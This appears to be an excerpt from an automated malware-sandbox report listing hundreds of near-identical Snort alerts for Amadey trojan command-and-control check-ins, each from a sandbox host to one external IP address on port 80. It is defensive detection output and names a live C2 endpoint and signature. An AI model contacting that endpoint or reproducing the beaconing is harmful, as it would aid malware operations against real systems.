                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49793 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49794 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49795 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49796 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49797 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49798 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49799 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49800 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49801 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49802 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49803 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49804 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49805 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49806 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49807 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49808 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49809 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49810 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49811 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49812 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49814 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49815 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49816 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49817 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49818 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49819 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49820 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49821 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49822 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49823 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49824 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49825 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49826 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49827 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49828 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49829 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49830 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49831 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49832 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49833 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49834 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49835 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49836 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49837 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49838 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49839 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49840 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49841 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49842 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49843 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49844 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49845 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49846 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49847 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49848 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49849 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49850 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49851 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49852 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49853 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49854 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49855 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49856 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49857 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49858 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49859 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49860 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49861 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49862 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49863 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49864 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49865 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49866 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49867 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49868 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49869 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49870 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49871 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49872 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49873 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49874 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49875 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49876 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49877 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49878 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49879 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49881 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49882 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49883 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49884 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49885 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49886 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49887 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49888 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49889 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49890 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49891 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49892 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49893 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49894 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49895 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49896 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49897 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49898 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49899 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49900 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49901 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49902 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49903 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49904 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49905 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49906 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49907 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49908 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49909 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49910 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49911 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49912 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49913 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49914 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49915 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49916 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49917 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49918 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49919 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49920 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49921 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49922 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49923 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49924 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49925 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49926 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49927 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49928 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49929 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49930 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49931 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49932 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49933 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49934 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49935 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49936 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49937 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49938 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49939 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49940 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49941 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49942 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49943 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49944 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49945 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49946 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49947 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49948 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49949 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49950 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49951 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49952 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49953 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49954 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49955 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49956 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49957 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49958 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49959 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49960 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49961 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49962 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49963 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49964 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49965 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49966 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49967 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49968 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49969 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49970 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49971 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49973 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49974 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49975 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49976 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49977 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49978 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49979 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49980 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49981 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49982 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49983 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49984 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49985 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49986 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49987 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49988 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49989 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49990 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49991 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49992 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49993 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49994 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49995 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49996 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49997 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49998 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49999 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50000 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50001 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50002 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50003 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50004 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50005 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50006 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50007 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50008 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50009 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50010 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50011 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50012 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50013 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50014 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50015 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50016 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50017 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50018 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50019 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50020 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50021 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50022 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50023 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50024 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50025 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50026 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50027 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50028 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50029 -> 62.204.41.4:80
